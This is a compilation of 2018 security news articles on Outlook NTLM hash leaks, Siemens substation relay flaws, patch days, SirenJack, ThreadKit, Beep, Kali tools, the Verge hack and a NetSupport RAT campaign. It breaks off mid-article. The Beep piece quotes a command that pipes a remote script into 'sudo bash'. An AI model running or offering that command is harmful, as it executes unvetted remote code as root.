“Microsoft Outlook will automatically retrieve remote OLE content when an RTF email is previewed. When remote OLE content is hosted on a SMB/CIFS server, the Windows client system will attempt to authenticate with the server using single sign-on (SSO).” states the CERT. “This may leak the user’s IP address, domain name, user name, host name, and password hash. If the user’s password is not complex enough, then an attacker may be able to crack the password in a short amount of time.”

Microsoft Outlook automatically renders OLE content, this means that it will initiate an automatic authentication with the attacker’s controlled remote server over SMB protocol using single sign-on (SSO). This will cause the leak of NTLMv2 hashed version of the password that could be cracked by the attacks with commercial tools and services.

Microsoft attempted to address the flaw in the last security updates, but it only successfully fixed automatically SMB connections when it previews RTF emails, any other SMB attack is still feasible.

“It is important to realize that even with this patch, a user is still a single click away from falling victim to the types of attacks described above,” Dormann added. “For example, if an email message has a UNC-style link that begins with “\\”, clicking the link initiates an SMB connection to the specified server.”

SMB-hack-outlook

Summarizing, the installation of the Microsoft update for CVE-2018-0950 will not fully protect users from the exploitation of this issue.

Users are advised to apply the following mitigations:

  • Install the Microsoft update for CVE-2018-0950.
  • Block ports 445/tcp, 137/tcp, 139/tcp, along with 137/udp and 139/udp used for SMB sessions.
  • Block NT LAN Manager (NTLM) Single Sign-on (SSO) authentication.
  • Always strong passwords.
  • Never  click on suspicious links embedded in emails.

Pierluigi Paganini

(Security Affairs – CVE-2018-0950, Microsoft Outook)

The post CVE-2018-0950 flaw in Microsoft Outlook could be exploited to steal Windows Passwords appeared first on Security Affairs.



Security Affairs

Researchers discovered several flaws that expose electrical substations to hack

The ICS-CERT and Siemens published are warning organizations of security flaws in Siemens devices (SIPROTEC 4, SIPROTEC Compact, and Reyrolle devices) that could be exploited by hackers to target electrical substations.

“Successful exploitation of these vulnerabilities could allow an attacker to upload a modified device configuration that could overwrite access authorization passwords, or allow an attacker to capture certain network traffic that could contain authorization passwords.” reads the advisory published by the ICS-CERT.

The Siemens devices provide integrated protection, control, measurement, and automation functions for several applications, including electrical substations.

Siemens has already issued security patches and mitigations for the flaws.

electrical substations

The vulnerabilities were discovered by security experts at Positive Technologies, let’s analyzed the flaws discovered by the experts.

“Positive Technologies experts Ilya Karpov, Dmitry Sklyarov, and Alexey Stennikov detected high-risk vulnerabilities in power-system protection from Siemens that is used to control and protect such power supply facilities equipment as electrical substations or hydroelectric power stations. Siemens has fixed the vulnerabilities and issued the corresponding advisories.” states the post published by Positive Technologies.

“By exploiting these vulnerabilities, an attacker is able to change the configuration of power-system protection relay which can lead to disruption of the power equipment protection function (and potentially to an accident) or customer curtailment.”

The most severe vulnerability (rated high severity), tracked as CVE-2018-4840 can be exploited by a remote and unauthenticated attacker to modify the device’s configuration and overwrite access passwords.

“The device engineering mechanism allows an unauthenticated remote user to upload a modified device configuration overwriting access authorization passwords. ” reads the security advisory published by Siemens.

The second flaw, tracked as CVE-2018-4839, is a medium severity issue that could be exploited by a local or network attacker to recover the access authorization password by intercepting network traffic or obtaining data from the targeted device. Once the attacker has obtained the password he can use it to gain complete access to a device.

Both CVE-2018-4840 and CVE-2018-4839 affects the EN100 Ethernet modules and the DIGSI 4 operation and configuration software used by SIPROTEC 4 and SIPROTEC Compact relay families.

Researchers at Positive Technologies also discovered a high severity vulnerability tracked as CVE-2018-4838 that resides in the web interface of the relays (SIPROTEC 4, SIPROTEC Compact, and Reyrolle relays that use EN100 modules.) that could be exploited by an unauthenticated attacker to downgrade the firmware on a device to a version that is known to be affected by vulnerabilities.

CVE-2018-4838 allows an intruder to remotely upload an obsolete firmware version that contains known vulnerabilities and to execute code on the target system. Devices that use the EN100 communication module (SIPROTEC 4, SIPROTEC Compact, and Reyrolle) can be attacked.” states the advisory published by the company.

The above issued represent a serious threat to electrical substations that are a key component in the electric grids.

Pierluigi Paganini

(Security Affairs – electrical substations, hacking)

The post Researchers discovered several flaws that expose electrical substations to hack appeared first on Security Affairs.

SAP April 2018 Security Patch Day address critical flaws in web browser controls in SAP Business Client

SAP released the April 2018 Security Patch Day, a collection of ten security patches that also address critical vulnerabilities in web browser controls in SAP Business Client.

SAP also released 2 updates to previously released security notes, one note was rated Hot News, 4 were rated High Priority, and 7 were rated Medium Priority.

The most common vulnerability type is Implementation Flaw.

April 2018 Security Patch Day

Below the list of security notes released on the April 2018 Security Patch Day:

Note# Title Priority CVSS
2622660 Security updates for web browser controls delivered with SAP Business Client
Product – SAP Business Client, Version – 6.5
Hot News 9.8
2587985 Denial of Service (DOS) in SAP Business One
Related CVE – CVE-2017-7668
Product – SAP Business One, Versions – 9.2, 9.3
High 7.5
2376081 Update to Security Note released on August 2017 Patch Day: Code Injection vulnerability in Visual Composer 04s iviews
Product – SAP Visual Composer, Versions – 7.00, 7.01, 7.02, 7.30, 7.31
High 7.4
2552318 Update 1 to Security Note 2376081
Product – SAP Visual Composer, Versions – 7.00, 7.01, 7.02, 7.30, 7.31
High 7.4
2537150 [CVE-2018-2408Improper Session Management in SAP Business Objects – CMC/BI Launchpad/Fiorified BI Launchpad
Product – SAP Business Objects
Versions – 4.0, from 4.10, from 4.20, 4.30
High 7.3
2614141 [CVE-2018-2409Improper session management when using SAP CP Connectivity Service and Cloud Connector
Product – SAP Cloud Platform Connector
Version – 2.0
Medium 6.3
2595800 [CVE-2018-2403Multiple Security Vulnerabilities in SAP Disclosure Management
Related CVEs – CVE-2018-2404CVE-2018-2412CVE-2018-2413
Product – SAP Disclosure Management
Version – 10.1
Medium 5.4
2372688 [CVE-2018-2405] Cross-Site Scripting in Solution Manager Incident Management Workcenter
Product – SAP Solution Manager
Versions – 7.10, 7.20
Medium 5.4
2582870 [CVE-2018-2410Cross-Site Scripting (XSS) Vulnerability in SAP Business One Browser Access
Product – SAP Business One
Version – 9.20, 9.30
Medium 5.4
2201710 Update to Security Note released on September 2015 Patch Day:Fixing Logjam and Alternative chains certificate forgery vulnerabilities in multiple SAP products
Product – Sybase PowerBuilder, Version – 12.6
Product – SMP, Version – 2.3
Product – Agentry, Version – 6.0
Product – SAP Open Switch, Version – 15.1
Product – SAP Open Server, Versions – 15.7, 16.0
Product – SDK for SAP ASE, Version – 16.0
Product – SYBASE SOFTWARE DEV KIT, Version – 15.7
Product – SYBASE IQ, Version – 15.4
Product – SAP IQ, Version – 16.0
Product – Sybase SQL Anywhere, Versions – 12.0.1, 16.0
Product – SAP SQL Anywhere, Version – 17.0
Product – SAP SQL Anywhere OnDemand, Version – 1.0
Product – SAP ASE, Versions – 15.7, 16.0
Product – SAP Replication Server, Version – 15.7
Product – SYBASE ECDA, Version – 15.7
Product – SAP HANA Smart Data Streaming, Version – 1.0
Product – SAP Complex Assembly Manufacturing, Version – 7.2
Product – SAP Data Services, Version – 4.2
Medium 5.4
2560132 [CVE-2018-2406Unquoted windows search path vulnerability in Crystal Reports Server, OEM Edition
Product – SAP Crystal Reports Server, OEM Edition
Versions – 4.0, 4.10, 4.20, 4.30
Medium 5.3
2598687 Missing XML Validation vulnerability in SAP Control Center and SAP Cockpit Framework
Related CVE – CVE-2009-3960
Product – SAP Control Center and SAP Cockpit Framework
Medium 4.3

The most severe note, tracked as 2622660, addresses multiple issues in the web browser controls used to display pages in SAP Business Client 6.5 PL5. The vulnerabilities affect the browser controls for Microsoft’s Internet Explorer (IE) and the open source Chromium.

“The bugs concern vulnerabilities in web browser controls that are used to display pages in SAP Business Client 6.5 PL5. Web browser controls are programmable building blocks that software developers use to embed web pages in their applications.” reads the analysis of the Onapsis firm.

“The latter has been determined to show multiple weaknesses like memory corruption, information disclosure and more. Although the SAP note does not explicitly mention it, similar security flaws can be expected for IE,”

The April 2018 Security Patch Day also addresses a DoS flaw, tracked as CVE-2017-7668, in SAP Business One.

“An attacker can use Denial of service vulnerability for terminating a process of a vulnerable component.” reads the analysis published by the firm ERPScan. “For this time nobody can use this service, this fact negatively influences on a business processes, system downtime and business reputation as result. Install this SAP Security Note to prevent the risks.”

SAP also fixed an improper session management (CVE-2018-2408) affecting SAP Business Objects.

SAP also addressed a code injection vulnerability in SAP Visual Composer that could be exploited by attackers to inject code into the back-end application by sending a specially crafted HTTP GET request to the Visual Composer.

 

Pierluigi Paganini

(Security Affairs – April 2018 Security Patch Day, SAP)

The post SAP April 2018 Security Patch Day address critical flaws in web browser controls in SAP Business Client appeared first on Security Affairs.

Smashing Security #073: Rick Astley: Never gonna hack you up

Smashing Security #073: Rick Astley: Never gonna hack you up

Politician admits to hacking a rival’s website, T-Mobile Austria ends up in a Twitter security storm, and siren systems are hit by a Rick Astley attack.

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, who are joined this week by special guest Maria Varmazis.

SirenJack bug puts emergency alert sirens at risk for hacks

Researchers have found a vulnerability in emergency-alert systems provided by ATI Systems that could put millions at risk by allowing hackers to sound false alarms or otherwise mislead the public in regards to warning of natural and man-made disasters in the United States. Bastille, which specializes in software-defined radio enterprise threat...

Read the whole entry... »

Related Stories

AMD and Microsoft release microcode and operating system updates against Spectre flaw

AMD released patches for Spectre Variant 2 attack that includes both microcode and operating system updates. AMD and Microsoft worked together to issue the updates on Tuesday.

AMD and Microsoft released the microcode and security updates for Spectre vulnerabilities.

The Meltdown and Spectre attacks could be exploited by attackers to bypass memory isolation mechanisms and access target sensitive data.

The Meltdown attack could allow attackers to read the entire physical memory of the target machines stealing credentials, personal information, and more.

The Meltdown exploits the speculative execution to breach the isolation between user applications and the operating system, in this way any application can access all system memory.

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The attack breaks the isolation between different applications, allowing to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

amd spectre flaw

Meltdown attacks trigger the CVE-2017-5754 vulnerability, while Spectre attacks the CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). According to the experts, only Meltdown and Spectre Variant 1 can be addressed via software, while Spectre Variant 2 required an update of the microcode for the affected processors. Software mitigations include.

AMD released patches for Spectre Variant 2 attack that includes both microcode and operating system updates. AMD and Microsoft worked together to issue the updates on Tuesday.

“Today, AMD is providing updates regarding our recommended mitigations for Google Project Zero (GPZ) Variant 2 (Spectre) for Microsoft Windows users. These mitigations require a combination of processor microcode updates from our OEM and motherboard partners, as well as running the current and fully up-to-date version of Windows.” reads the announcement published by AMD. “For Linux users, AMD recommended mitigations for GPZ Variant 2 were made available to our Linux partners and have been released to distribution earlier this year.”

Microsoft initially released Spectre security patches for AMD-based systems in January, but it was forced to suspend them due to instability issues.

AMD experts highlighted that is quite difficult to exploit the Spectre Variant 2 on AMD chips, for this reason, it worked with partners to provide a combination of microcode and OS updates.

“While we believe it is difficult to exploit Variant 2 on AMD processors, we actively worked with our customers and partners to deploy the above described combination of operating system patches and microcode updates for AMD processors to further mitigate the risk,” continues the announcement.

AMD customers can install the microcode by downloading BIOS updates provided by manufacturers, while Windows 10 updates are included in the Microsoft April Patch Tuesday.

Windows 10 updates released by Microsoft on Tuesday include Spectre Variant 2 mitigationsfor AMD devices. According to AMD, the support for these mitigations for AMD processors in Windows Server 2016 is expected to be available following final validation and testing.

For Linux systems, AMD states that mitigations for GPZ Variant 2 were made available to its Linux partners and have been released to distribution earlier this year.

Pierluigi Paganini

(Security Affairs – Microsoft, Spectre)

The post AMD and Microsoft release microcode and operating system updates against Spectre flaw appeared first on Security Affairs.

Ransomware incidents double, threatening companies of all sizes

Ransomware is the most common malware used when it comes to breaches, according to Verizon’s 2018 Data Breach Investigations Report. Verizon’s 2018 Data Breach Investigations Report (DBIR) is out, and

The post Ransomware incidents double, threatening companies of all sizes appeared first on The Cyber Security Place.

Microsoft April Patch Tuesday – Update your system now to avoid being hacked by visiting a site

 

Microsoft has released April Patch Tuesday security updates that address 66 vulnerabilities, five of them could be exploited by an attacker to compromise a PC by just tricking the victims into visiting a website or opening a specifically crafted file.

Hackers can compromise your computer just visiting a malicious website or clicking a malicious link.

Microsoft has released April Patch Tuesday that addresses 66 vulnerabilities, 24 of which are rated critical and five of them could be exploited by an attacker to compromise a PC by just tricking the victims into visiting a website or opening a specifically crafted file.

Microsoft April Patch Tuesday includes the fix for five critical remote code execution vulnerabilities in Windows Graphics Component (CVE-2018-1010-1012-1013-1015-1016) that are related to improper handling of embedded fonts by the Font Library.

“In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website,” reads the advisory for the CVE-2018-1013.

“An attacker could also embed an ActiveX control marked ‘safe for initialization’ in an application or Microsoft Office document that hosts the IE rendering engine.”

The flaws were discovered by Hossein Lotfi, a security researcher at Flexera Software. and affect all versions of Windows OS to date.

Microsoft also addressed a denial of service vulnerability in Windows Microsoft Graphics that could be exploited by an attacker to cause a targeted system to stop responding. This vulnerability tied the way Windows handles objects in memory.

Microsoft April Patch Tuesday also addressed a critical RCE vulnerability, tracked as CVE-2018-1004, that resides in the Windows VBScript Engine and affects all versions of Windows.

“An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,” read the security advisory published by Microsoft.

April Patch Tuesday

Microsoft security updates also address a total of six vulnerabilities in Adobe Flash Player, three of which were rated critical.

Users need to apply security updates as soon as possible to protect their systems.

Pierluigi Paganini

(Security Affairs – Microsoft April Patch Tuesday, hacking)

The post Microsoft April Patch Tuesday – Update your system now to avoid being hacked by visiting a site appeared first on Security Affairs.

Top VEVO Music videos Including ‘Despacito’ defaced by hackers

Some of the most popular music VEVO videos on YouTube, including the world’s most popular video ‘Despacito’ has been hacked by a duo calling themselves Prosox and Kuroi’SH.

Some of the most popular music videos on YouTube, including the world’s most popular YouTube video ‘Despacito’ has been hacked.

Popular videos of  pop stars like Shakira, Drake, Selena Gomez, Adele, Taylor Swift, and Calvin Harris were replaced by hackers that spread the message “Free Palestine.”

Despacito, the Luis Fonsi’s mega-hit that was watched five billion times was replaced by an image of a group of armed men dressed in hooded sweatshirts that appeared to come from the Spanish series “Money Heist.”

The videos were hacked by a duo calling themselves Prosox and Kuroi’SH.

All the hacked videos are on singers’ accounts belonging to the VEVO platform that is owned by a group of some of the biggest music corporations.

According to YouTube, the problem doesn’t affect its platform but Vevo.

“After seeing unusual upload activity on a handful of Vevo channels, we worked quickly with our partner to disable access while they investigate the issue,” a YouTube spokesperson said.

Vevo confirmed a security breach on systems.

“We are working to reinstate all videos affected and our catalog to be restored to full working order. We are continuing to investigate the source of the breach,” it said in a statement.

The alleged hacker @ProsoxW3b started posting severs Tweets first saying it has hacked for fun and not for profit.

despacito prosox-tweet

Pierluigi Paganini

(Security Affairs – Despacito Hacked, VEVO)

The post Top VEVO Music videos Including ‘Despacito’ defaced by hackers appeared first on Security Affairs.

SirenJack flaw in Emergency Alert Systems could be exploited to trigger false alarms

“SirenJack is a vulnerability found in ATI Systems’ emergency alert systems that can be exploited via radio frequencies (RF) to activate sirens and trigger false alarms.”

Security experts at Bastille have devised a new technique, dubbed SirenJack to remotely hack emergency warning systems.

Emergency warning systems are used worldwide to alert the public of emergency situations like natural disasters and strikes.

“False alarms cause widespread concern and increasing distrust in these systems, particularly as seen in 2017 after the Dallas Siren incident that set off over 150 tornado warning sirens citywide for more than 90 minutes.” reads the website published by experts.

“SirenJack is a vulnerability found in ATI Systems’ emergency alert systems that can be exploited via radio frequencies (RF) to activate sirens and trigger false alarms. The radio protocol used to control the sirens is not secure (activation commands are sent ‘in the clear’ – no encryption is used).” continues the Bastille.

Ill-intentioned could trigger false alarms to cause panic and chaos among the population.

Researchers say they have discovered a new attack method that allows hackers to remotely trigger sirens. The SirenJack method leverages a vulnerability that resides in emergency alert systems made by ATI Systems.

These systems are widely adopted, it is quite easy to find them in military facilities and industrial plants.

The issue is related to the implementation of unsecured radio protocol controls.

The researcher Balint Seeber started its analysis back in 2016, he focused its researcher on San Francisco’s outdoor public warning systems.

The warning systems had been using RF communications, the experts discovered that was possible to issue commands without encryption, allowing a man-in-the-middle attacker to forge them.

It was a joke for attackers to identify the radio frequency used by the targeted siren and send issue a specially crafted message that triggers an alarm.

“A single warning siren false alarm has the potential to cause widespread panic and endanger lives,” explained Chris Risley, CEO of Bastille Networks. “Bastille informed ATI and San Francisco of the vulnerability 90 days ago, to give them time to put a patch in place. We’re now disclosing SirenJack publicly to allow ATI Systems’ users to determine if their system has the SirenJack vulnerability. We also hope that other siren vendors investigate their own systems to patch and fix this type of vulnerability.”

ATI Systems has been made aware of the vulnerability and it has created a patch that adds an additional layer of security to the packets sent over the radio. The company says the patch is being tested and will be made available shortly, but noted that installing it is not an easy task considering that many of its products are designed for each customer’s specific needs.

ATI Systems tried to downplay the severity of the discovery, the company explained that it is necessary a lot of time in order to be able to replicate the attack devised by the researchers.

Eventi if the modern warning systems use a new protocol, ATI Systems admitted that the attack could work against system still in use in cities like San Francisco.

SirenJack.PNG

The experts set up a dedicated website that also includes a video PoC of the attack.

Bastille researchers already devised other attack techniques in the past, they demonstrated how to remotely target, wireless keyboards with the KeySniffer technique, Wireless mouse/keyboard dongles with MouseJack attacks and home networks with the CableTap technique.

Pierluigi Paganini

(Security Affairs – SirenJack, hacking)

The post SirenJack flaw in Emergency Alert Systems could be exploited to trigger false alarms appeared first on Security Affairs.

Public services at the Caribbean island Sint Maarten shut down by a cyber attack

A cyber attack shut down the entire government infrastructure of the Caribbean island Sint Maarten. public services were interrupted.

A massive cyber attack took offline the entire government infrastructure of the Caribbean island Sint Maarten. it is a constituent country of the Kingdom of the Netherlands.

Government building remained closed after the attack.

“The Ministry of General Affairs hereby informs the public that the recovery process of the Government of Sint Maarten ICT Network is progressing steadily and will continue throughout the upcoming weekend following the cyber-attack on Monday April 2ndreported the media.  

According to the local media, The Daily Herald a cyber attack hit the country on April 2nd, the good news is that yesterday the government services were resumed with the exception of the Civil Registry Department.

Sint Maarten hacking

According to the authorities, this is the third attack in over a year, but at the time of writing, there are no public details on the assault.

“The system was hacked on Easter Monday, the third such attack in over a year. No further details about the hacking have been made public by government.
The Ministry “thanked the people of St. Maarten for their patience during this period.” continues the announcement.

Below the announcement made by the Government on Facebook.

 

The incident demonstrates the importance of a cyber strategy for any government, in this case, hacked shut down government networks but in other circumstances, they can hack into government systems to launch cyber attack against a third-party nation.

It is essential a mutual support among stated to prevent such kind of incident.

Pierluigi Paganini

(Security Affairs – Sint Maarten, cyber attack)

The post Public services at the Caribbean island Sint Maarten shut down by a cyber attack appeared first on Security Affairs.

Booby-trapped Office docs build with ThreadKit trigger CVE-2018-4878 flaw

Microsoft Office documents created with the exploit builder kit dubbed ThreadKit now include the code for CVE-2018-4878 flaw exploitation.

At the end of March, security experts at Proofpoint discovered a Microsoft Office document exploit builder kit dubbed ThreadKit that has been used to spread a variety of malware, including banking Trojans and RATs (i.e. TrickbotChthonicFormBook and Loki Bot).

The exploit kit was first discovered in October 2017, but according to the experts, crooks are using it at least since June 2017.

The ThreadKit builder kit shows similarities to Microsoft Word Intruder (MWI), it was initially being advertised in a forum post as a builder for weaponized decoy documents.

Just after its appearance, documents created with the ThreadKit builder kit have been observed in several campaigns.

Now threat actors are using the ThreadKit builder kit to target the recently patched CVE-2018-4878 Flash vulnerability, experts started observing exploit code samples in the wild a few days ago.

ThreadKit adobe flaws

Adobe addressed the CVE-2018-4878 in February after North Korea’s APT group was spotted exploiting it in targeted attacks.

The vulnerability could be exploited by an attack by tricking victims into opening a document, web page or email containing a specially crafted Flash file.

According to the researcher Simon Choi the Flash Player flaw has been exploited by North Korea since mid-November 2017. The attackers exploited the zero-day vulnerability in attacks aimed at South Korean individuals involved in research activity on North Korea.

Now the exploit was included in the ThreadKit builder, based on Virus Total hashes posted to Pastebin.

The security expert Claes Splett has published a video that shows how to build a CVE-2018-478 exploit in ThreadKit.

Proofpoint experts reported that in the last weeks, the exploit kit included new exploits targeting vulnerabilities such as the CVE-2018-4878 Adobe Flash zero-day and several Microsoft office vulnerabilities (i.e. CVE-2018-0802 and CVE-2017-8570).

Pierluigi Paganini

(Security Affairs – CVE-2018-4878, ThreadKit)

The post Booby-trapped Office docs build with ThreadKit trigger CVE-2018-4878 flaw appeared first on Security Affairs.

Linux open source utility Beep is affected by several vulnerabilitues

Researchers have discovered several vulnerabilities in the Linux command line tool Beep, some experts suggest to remove the utility from distros.

An unnamed security researcher has found several vulnerabilities in the Linux command line tool Beep, including a severe flaw introduced by a patch for a privilege escalation vulnerability.

Beep is a small open source utility used in the past by Linux developers to produce a beep with a computer’s internal speaker, it allows users to control the pitch, duration, and repetitions of the sound.

The researcher discovered a race condition in the utility that could be exploited by an attacker to escalate privileges to root. Versions through 1.3.4 are affected by the flaw that was tracked as CVE-2018-0492.

Further info on the flaw is available on the website holeybeep.ninja

holey beep

Is your system vulnerable? In order to discover if a system is vulnerable it is possible to run the following command:

curl https://holeybeep.ninja/am_i_vulnerable.sh | sudo bash

A vulnerable machine will beep.

The Holey Beep website also provides a patch, but experts noticed that it actually introduces a potentially more serious vulnerability that could be exploited to execute an arbitrary code on the patched system.

“The patch vulnerability seems more severe to me, as people apply patches all the time (they shouldn’t do it as root, but people are people),” reads a message published by Tony Hoyle on the Debian bug tracker. “It’s concerning that the holeybeep.ninja site exploited an unrelated fault for ‘fun’ without apparently telling anyone.”

Beep is also affected by other issues, including integer overflow vulnerabilities, and a flaw that can reveal information about the file on the system.

Waiting for a code review of the utility, probably it is time to remove the utility from distros because PC speaker doesn’t exist in most modern systems.

Pierluigi Paganini

(Security Affairs – Linux distros, hacking)

The post Linux open source utility Beep is affected by several vulnerabilitues appeared first on Security Affairs.

Top 5 Most Useful Kali Linux Tools for Ethical Hackers

Best 5 Kali Linux tools for ethical hackers and security researchers

Kali Linux is one of the most loved distros by the ethical hacking and security community because of its pen-testing and exploit tools. It is a free, and open-source Linux-based operating system designed for digital forensics, penetration testing, reversing, and security auditing. Kali allows you to download a range of security-related programs such as Metasploit, Nmap, Armitage, Burp, and much more that can be used to test your network for security loops. It can run natively when installing on a computer’s hard disk, can be booted from a live CD or live USB, or it can run on a virtual machine. Kali Linux has a lot of tools available to learn and practice.

In this article, we bring to you the top 5 Kali Linux tools that a wannabe (ethical) hacker or security researcher can use.

1. Nmap (Network Mapper)

nmap-logo-1-1024x597

Abbreviated as Nmap, the Network Mapper is a versatile must-have tool for Network Security, plus it is a free and open source. It is largely used by security researchers and network administrators for network discovery and security auditing. System admins use Nmap for network inventory, determining open ports, managing service upgrade schedules, and monitoring host (A term used for “the computer on a network”) or service uptime.

The tool uses raw IP packets in many creative ways to determine what hosts are available on the network, what services (application name and version) they offer, which type of protocols are being used for providing the services, what operating system (and OS versions and possible patches) and what type and version of packet filters/firewalls are being used by the target.

2. Metasploit Framework

metasploit-1024x597

This tool is used for exploiting (utilizing network weakness for making a “backdoor”) vulnerabilities (weak points) on Network. This tool comes in both free and paid versions and not open source. The free version is good for normal exploits but deep penetration requires the paid version which gives you a full set of features. The paid version of Metasploit offers such important features that it deserves the price it claims.

The Metasploit Project is a hugely popular pen-testing (penetration testing) or hacking tool that is used by cybersecurity professionals and ethical hackers. Metasploit is essentially a computer security project that supplies information about known security vulnerabilities and helps to formulate penetration testing and IDS testing.

3. Wireshark

wireshark-1024x597

Some Kali Linux users may rate Wireshark as the top Wi-Fi pen-testing tool though it surprisingly missed making it to last year’s list. Wireshark is the world’s foremost network protocol analyzer. It lets you see what’s happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions.Wireshark is one of the best network [protocol]analyzer tools available, if not the best.

With Wireshark, you can analyze a network to the greatest detail to see what’s happening. Wireshark can be used for live packet capturing, deep inspection of hundreds of protocols, browse and filter packets and is multi-platform.

4. Aircrack-ng

aircrack-ng-kali-linux-tools-1024x597

The Aircrack suite of Wi-Fi (Wireless) hacking tools are legendary because they are very effective when used in the right hands. This tool also makes it to Concise top 10 for the first time. For those new to this wireless-specific hacking program, Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking hacking tool that can recover keys when sufficient data packets have been captured (in monitor mode).

For those tasked with penetrating and auditing wireless networks Aircrack-ng will become your best friend. It’s useful to know that Aircrack-ng implements standard FMS attacks along with some optimizations like KoreK attacks, as well as the PTW attacks to make their attacks more potent. If you are a mediocre hacker then you’ll be able to crack WEP in a few minutes and you ought to be pretty proficient at being able to crack WPA/WPA2.

5.THC Hydra

THC-Hydra-kali-linux-hacking-tools-1024x597

Concise polls place THC Hydra one place under ‘John The Ripper’ because of user popularity though it is as popular as John The Ripper. Essentially THC Hydra is a fast and stable Network Login Hacking Tool that will use a dictionary or brute-force attacks to try various password and login combinations on the login page.

This hacking tool supports a wide set of protocols including Mail (POP3, IMAP, etc.), Databases, LDAP (Lightweight Directory Access Protocol), SMB, VNC, and SSH (Secure Shell used by VPN software).

Source: Technotification

The post Top 5 Most Useful Kali Linux Tools for Ethical Hackers appeared first on TechWorm.

Sodexo Filmology data breach – Users need cancel their credit cards

Sodexo food services and facilities management company notified a number of customers that it was the victim of a targeted attack on its cinema vouchers platform Sodexo Filmology.

Sodexo food services and facilities management company notified a number of customers that it was the victim of a targeted attack on its cinema vouchers platform, Filmology and it is urging them to cancel their credit cards.

The service rewards UK employee via discounted cinema tickets, the website was taken down in response to the incident “to eliminate any further potential risk” to consumers and to protect their data.

Sodexo Filmology

Sodexo Filmology reported the incident to the Information Commissioner’s Office and hired a specialist forensic investigation team.

“We would advise all employees who have used the site between 19th March-3rd April to cancel their payment cards and check their payment card statements,” reads the data breach notification issued by Sodexo Filmology.

“These incidents have been caused by a targeted attack on the system we use to host our Cinema Benefits platform, despite having put in place a number of preventative measures with CREST-approved security specialists.”

“We sincerely apologise for any inconvenience this has caused you and are doing all that we can to provide access to your benefits via alternative means. We will share more information on this with you, or your provider, in the coming days.”

Making a rapid search online, we can verify that the attack has been going on for several months, several employees reported fraudulent activities on the Money Saving Expert forum in February.

“After speaking to Filmology to ask exactly what had happened, I was informed that my bank details were stolen from the payment page and that the incident has been reported to the ICO. The hack on the payment page was carried out over 2 months and involved many accounts.” wrote the user Chris.

Pierluigi Paganini

(Security Affairs – Sodexo Filmology, data breach)

The post Sodexo Filmology data breach – Users need cancel their credit cards appeared first on Security Affairs.

Verge Cryptocurrency suffered a cyber attack, dev team responded with an Hard Fork

The verge (XVG) currency schema was attacked last week, the hacker reportedly making off with $1 million-worth of tokens. The dev team responded with an Hard Fork.

Ripple (XRP) and Verge (XVG) are two cryptocurrencies that attracted many investors in the last months.

Last week attackers hackers the Verge cryptocurrency system by exploiting a vulnerability in its software and forced its developers to hard-fork the currency.

The bug in the cryptocurrency scheme allowed the attacker to mine blocks with bogus timestamps, it seems that attackers were able to generate new blocks at a rate of roughly one per second.

The hacker reportedly making off with $1 million-worth of tokens, the news was later confirmed on Bitcoin Talk forum by the user with the handle “ocminer” of the Suprnova Mining Pools.

“There’s currently a >51% attack going on on XVG which exploits a bug in retargeting in the XVG code.  Usually to successfully mine XVG blocks, every “next” block must be of a different algo.. so for example scrypt, then x17, then lyra etc.” wrote ocminer.

“Due to several bugs in the XVG code, you can exploit this feature by mining blocks with a spoofed timestamp. When you submit a mined block (as a malicious miner or pool) you simply set a false timestamp to this block one hour ago and XVG will then “think” the last block mined on that algo was one hour ago. Your next block, the subsequent block will then have the correct time..

And since it’s already an hour ago (at least that is what the network thinks) it will allow this block to be added to the main chain as well.”

OCminer speculated it was a 51 per attack(aka majority attack), this means that hackers in somehow were able to control the majority of the network mining power (hashrate).

The Verge development team finally confirmed on Wednesday the attack that caused the XVG value to drop from $0.07 to $0.05.

In response to the incident, the Verge team hard forked XVG that resulted in the creation of a new blockchain.

“The XVG team erroneously forked their entire network to ‘undo’ the exploited blocks, but this resulted in the entire network being unable to sync,” noted cryptocurrency news site The Merkle.

“When the team was made aware of their mistake, they were able to re-sync the network, but still have not completely defeated the issue.”

At the time of writing the Verge currency has recovered all its value.

verge hacked

Pierluigi Paganini

(Security Affairs – Verge, hacking)

The post Verge Cryptocurrency suffered a cyber attack, dev team responded with an Hard Fork appeared first on Security Affairs.

Crooks distribute malware masquerade as fake software updates and use NetSupport RAT

Researchers at FireEye have spotted a hacking campaign leveraging compromised websites to spread fake updates for popular software that were also used to deliver the NetSupport Manager RAT.

NetSupport is an off-the-shelf RAT that could be used by system admins for remote administration of computers. In the past, crooks abuse this legitimate application to deploy malware on victim’s machines.

Researchers at FireEye have spotted a hacking campaign that has been active for the past few months and that has been leveraging compromised websites to spread fake updates for popular software (i.e. Adobe Flash, Chrome, and FireFox) that were also used to deliver the NetSupport Manager remote access tool (RAT).

Once the victims have executed the updates, a malicious JavaScript file is downloaded, in most cases from a Dropbox link.

“Over the last few months, FireEye has tracked an in-the-wild campaign that leverages compromised sites to spread fake updates. In some cases, the payload was the NetSupport Manager remote access tool (RAT).” reads the analysis published by FireEye. 

“The operator behind these campaigns uses compromised sites to spread fake updates masquerading as Adobe Flash, Chrome, and FireFox updates.”

The JavaScript file gathers info on the target machine and sends it to the server that in turn sends additional commands, then it executes a JavaScript to deliver the final payload. The JavaScript that delivers the final payload is dubbed Update.js, it is executed from %AppData% with the help of wscript.exe.

netsupport RAT Update.js

According to FireEye, vxers used multiple layers of obfuscation to the initial JavaScript, while the second layer of the JavaScript contains the dec function that allows to decrypt and execute more JavaScript code.

“since the malware uses the caller and callee function code to derive the key, if the analyst adds or removes anything from the first or second layer script, the script will not be able to retrieve the key and will terminate with an exception.” continue the analysis.

Once executed, the JavaScript contacts the command and control (C&C) server and sends a value named ‘tid’ and the current date of the system in an encoded format, the server, in turn, provides a response that the script then decodes and executes it as a function named step2.

